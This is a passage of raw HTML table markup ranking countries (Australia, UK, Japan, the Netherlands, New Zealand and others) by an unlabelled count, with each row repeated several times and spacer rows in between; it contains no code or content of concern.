ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa)&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa)&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa)&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa)&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa)&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" 